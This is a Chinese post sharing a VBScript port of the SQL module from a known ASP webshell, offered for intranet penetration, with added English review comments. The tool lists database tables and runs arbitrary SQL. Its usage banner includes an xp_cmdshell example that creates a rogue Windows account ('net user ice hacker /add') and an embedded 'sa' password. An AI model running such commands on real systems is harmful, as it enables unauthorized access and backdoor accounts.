花了一點時間把以前的海陽頂端2006的sql模塊改成了vbs版,功能和原版一模一樣。用起來可能沒有asp版舒服,但能用,而且可以在dos下運行,滲透內網時估計你用得著。
' Host check: stop when the script was started by the windowed host
' (wscript.exe). WScript.Echo shows a dialog per call under that host, so the
' script asks to be run from a console host instead.
If StrComp(Right(WScript.FullName, 11), "wscript.exe", vbTextCompare) = 0 Then
    echo "Execute it under the cmd.exe Plz! Thx."
    echo "code by lcx"
    WScript.Quit
End If
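' Usage banner. Every action needs at least an action name and a connection
' string, so fewer than two arguments prints the help text and exits; the
' original fell through to the dispatcher and died on Wscript.Arguments(0).
'
' Review notes for readers of the examples below:
' - The sample connection strings embed a literal "sa" password. Anything
'   passed this way is a command-line argument and is recorded wherever
'   process command lines are logged.
' - The last example calls xp_cmdshell, which SQL Server 2005 and later ship
'   disabled; by default only sysadmin members can execute it.
If WScript.Arguments.Count < 2 Then
    echo "Usage: cscript sql.vbs showTables e:/hytop.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs;"
    echo "usage: cscript sql.vbs query 連接字符串 <表名=default:""""> sql語句 <頁數=default:1>"
    echo "exp:cscript sql.vbs showTables "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)
    echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"select * from name"&chr(34)&Space(1) & 1
    echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"update....."&chr(34)&Space(1) & 1
    echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"exec master.dbo.xp_cmdshell 'net user ice hacker /add'--"&chr(34)&Space(1) & 1
    ' Stop here: nothing below can work without the required arguments.
    WScript.Quit
End If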
' Report a pending error and terminate the script.
'   Err - the value the caller passes in (every visible caller passes Err).
' When Err evaluates as true, the description and source are printed, the
' error is cleared and the host exits; otherwise the Sub returns silently.
' NOTE(review): no "On Error Resume Next" appears in the visible script, so a
' failing call presumably aborts the host before this Sub is reached - confirm.
Sub chkErr(Err)
    Dim report
    If Err Then
        report = "錯誤: " & Err.Description & "錯誤源: " & Err.Source & vbcrlf
        echo report
        Err.Clear
        WScript.Quit
    End If
End Sub
' Thin wrapper around WScript.Echo so the rest of the script has a single
' output routine.
'   str - the text to print.
Sub echo(str)
    Call WScript.Echo(str)
End Sub
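' Return a printable stand-in for a Null value.
'   str - any value, typically a recordset field.
' Returns a single space when str is Null, otherwise str unchanged.
' The original assigned to str itself; VBScript passes arguments by reference
' by default, so a caller's variable could be overwritten. The result is now
' written to the return value only.
Function fixNull(str)
    If IsNull(str) Then
        fixNull = " "
    Else
        fixNull = str
    End If
End Function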
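' Print a numbered list of error messages and terminate the script.
'   str - one or more messages joined with "$$".
' The original appended "<br/>" to every entry; that tag only clutters
' console output, so it is no longer emitted.
' NOTE(review): no caller of this Sub is visible in this file.
Sub showErr(str)
    Dim i, arrayStr
    arrayStr = Split(str, "$$")
    echo "出錯信息:" & vbCrLf
    For i = 0 To UBound(arrayStr)
        echo CStr(i + 1) & ". " & arrayStr(i)
    Next
    echo vbCrLf
    WScript.Quit
End Sub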
' -----------------------------------------------------------------
' Entry point: hand control to the action dispatcher.
' -----------------------------------------------------------------
Call pageMsDataBase()
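' Dispatch on the first command-line argument.
'   "showTables" -> showTables, "query" -> showQuery.
' Changes from the original:
' - the action name is matched case-insensitively;
' - an unrecognised action is reported instead of being ignored silently;
' - the unused read of Wscript.Arguments(1) is gone (each action reads its own
'   arguments).
Sub pageMsDataBase()
    Dim theAct
    theAct = WScript.Arguments(0)
    Select Case LCase(theAct)
        Case "showtables"
            Call showTables()
        Case "query"
            Call showQuery()
        Case Else
            echo "Unknown action: " & theAct
            WScript.Quit
    End Select
End Sub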
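' List every table of the target database together with its column metadata.
' Reads the connection target from Wscript.Arguments(1):
'   "sql:<OLE DB connection string>" is used as given (prefix stripped);
'   anything else is treated as a path to a Jet (.mdb) file.
' Changes from the original:
' - "vbclrf" was a misspelling of vbCrLf; as an undeclared name it evaluated
'   to Empty and added nothing. It is spelled correctly now.
' - the per-table column recordset and the table recordset are closed.
' NOTE(review): the connection string, credentials included, comes straight
' from the command line and is visible in process-creation logs.
Sub showTables()
    Dim conn, sqlStr, rsTable, rsColumn, connStr, tablesStr
    sqlStr = WScript.Arguments(1)
    If LCase(Left(sqlStr, 4)) = "sql:" Then
        connStr = Mid(sqlStr, 5)
    Else
        connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
    End If
    Set conn = CreateObject("Adodb.Connection")
    conn.Open connStr
    chkErr(Err)
    ' getTableList fills rsTable (passed by reference) and rewinds it.
    tablesStr = getTableList(conn, sqlStr, rsTable)
    echo tablesStr & "================================================="
    Do Until rsTable.Eof
        ' 4 = adSchemaColumns, restricted to the current table name.
        Set rsColumn = conn.OpenSchema(4, Array(Empty, Empty, rsTable("Table_Name").value))
        echo rsTable("Table_Name") & vbCrLf
        Do Until rsColumn.Eof
            echo "字段名:" & rsColumn("Column_Name") & vbCrLf
            echo "類型:" & getDataType(rsColumn("Data_Type")) & vbCrLf
            echo "大小:" & rsColumn("Character_Maximum_Length") & vbCrLf
            echo "精度:" & rsColumn("Numeric_Precision") & vbCrLf
            echo "允許為空:" & rsColumn("Is_Nullable") & vbCrLf
            echo "默認值:" & rsColumn("Column_Default") & vbCrLf & vbCrLf
            rsColumn.MoveNext
        Loop
        rsColumn.Close
        rsTable.MoveNext
        echo vbCrLf
    Loop
    echo "==============================================================="
    rsTable.Close
    conn.Close
    Set conn = Nothing
    Set rsTable = Nothing
    Set rsColumn = Nothing
End Sub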
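' Run one SQL statement against the target database and print the outcome.
' Arguments (after the action name):
'   1 - connection target ("sql:<connection string>" or a Jet .mdb path)
'   2 - table name, used only as a label in the output
'   3 - the SQL text
'   4 - optional page number for SELECT results (20 rows per page, default 1)
' Statements starting with "select " are opened as a recordset and paged;
' anything else is passed to conn.Execute unchanged and only "done" is printed.
' Changes from the original:
' - the page argument is really optional now, as the usage text states; the
'   original read Wscript.Arguments(4) unconditionally;
' - a missing SQL argument prints the usage line instead of failing;
' - the page number is clamped to 1..PageCount before it is applied;
' - the page total is read from rs.PageCount directly (the original counting
'   loop printed the requested page when PageCount was 0);
' - the table-list recordset is closed.
' NOTE(review): the script applies no filter to the SQL text, so what a
' statement can do is bounded only by the privileges of the login in the
' connection string; a least-privileged login is the effective control.
Sub showQuery()
    Dim i, j, rs, sql, page, conn, sqlStr, connStr, rsTable, tablesStr, theTable
    Dim argCount, pageTotal
    argCount = WScript.Arguments.Count
    If argCount < 4 Then
        echo "usage: cscript sql.vbs query 連接字符串 <表名=default:""""> sql語句 <頁數=default:1>"
        WScript.Quit
    End If
    sqlStr = WScript.Arguments(1)
    theTable = WScript.Arguments(2)
    sql = WScript.Arguments(3)
    page = 1
    If argCount > 4 Then
        If IsNumeric(WScript.Arguments(4)) Then
            page = CLng(WScript.Arguments(4))
        End If
    End If
    If page < 1 Then
        page = 1
    End If
    If LCase(Left(sqlStr, 4)) = "sql:" Then
        connStr = Mid(sqlStr, 5)
    Else
        connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
    End If
    Set rs = CreateObject("Adodb.RecordSet")
    Set conn = CreateObject("Adodb.Connection")
    conn.Open connStr
    chkErr(Err)
    tablesStr = getTableList(conn, sqlStr, rsTable)
    echo "數據庫表結構查看:"
    echo tablesStr & "========================================================"
    echo ">SQL命令執行及查看<:" & vbCrLf
    If sql <> "" And Left(LCase(sql), 7) = "select " Then
        ' 1, 1 = adOpenKeyset, adLockReadOnly.
        rs.Open sql, conn, 1, 1
        chkErr(Err)
        rs.PageSize = 20
        pageTotal = rs.PageCount
        If Not rs.Eof Then
            ' Keep the requested page inside the result set.
            If pageTotal > 0 And page > pageTotal Then
                page = pageTotal
            End If
            rs.AbsolutePage = page
        End If
        If rs.Fields.Count > 0 Then
            echo "SQL操作 - 執行結果" & vbCrLf
            echo "====================" & theTable & "列名如下========================================"
            For j = 0 To rs.Fields.Count - 1
                echo rs.Fields(j).Name & vbCrLf
            Next
            ' Print at most one page (20 rows), one field value per line.
            For i = 1 To 20
                If rs.Eof Then
                    Exit For
                End If
                For j = 0 To rs.Fields.Count - 1
                    echo fixNull(rs(j)) & vbCrLf
                Next
                rs.MoveNext
            Next
        End If
        echo "================================================================="
        echo " 共有" & rs.Fields.Count & "列" & vbCrLf
        echo " 共有" & pageTotal & "頁"
        rs.Close
    Else
        If sql <> "" Then
            conn.Execute sql
            chkErr(Err)
            echo "執行完畢!" & vbCrLf
        End If
    End If
    rsTable.Close
    conn.Close
    Set rs = Nothing
    Set conn = Nothing
    Set rsTable = Nothing
End Sub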
' Translate an ADO data-type code into the label printed by showTables.
'   typeId - numeric type code from the schema rowset's Data_Type column.
' Returns the label for the seven codes handled below; any other code is
' returned unchanged.
Function getDataType(typeId)
    Dim label
    Select Case typeId
        Case 2      ' adSmallInt
            label = "整型"
        Case 3      ' adInteger
            label = "長整型"
        Case 5      ' adDouble
            label = "雙精度型"
        Case 7      ' adDate
            label = "日期/時間"
        Case 11     ' adBoolean
            label = "是/否"
        Case 128    ' adBinary
            label = "OLE 對象"
        Case 130    ' adWChar
            label = "文本"
        Case Else
            label = typeId
    End Select
    getDataType = label
End Function
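' Open the table schema rowset and return the table names as text.
'   conn    - an open ADODB.Connection.
'   sqlStr  - unused here; kept so existing callers keep working.
'   rsTable - output: receives the schema recordset, rewound to its first row
'             so the caller can walk it again.
' Returns one "[name]" entry per table, each followed by a line break.
' Change from the original: MoveFirst is skipped when the rowset is empty;
' calling it on a recordset with no rows raises a runtime error.
Function getTableList(conn, sqlStr, rsTable)
    Dim names
    ' 20 = adSchemaTables; the fourth restriction keeps rows of type "table".
    Set rsTable = conn.OpenSchema(20, Array(Empty, Empty, Empty, "table"))
    echo "存在以下表名:"
    names = ""
    Do Until rsTable.Eof
        names = names & "[" & rsTable("Table_Name") & "]" & vbCrLf
        rsTable.MoveNext
    Loop
    If Not (rsTable.BOF And rsTable.EOF) Then
        rsTable.MoveFirst
    End If
    getTableList = names
End Function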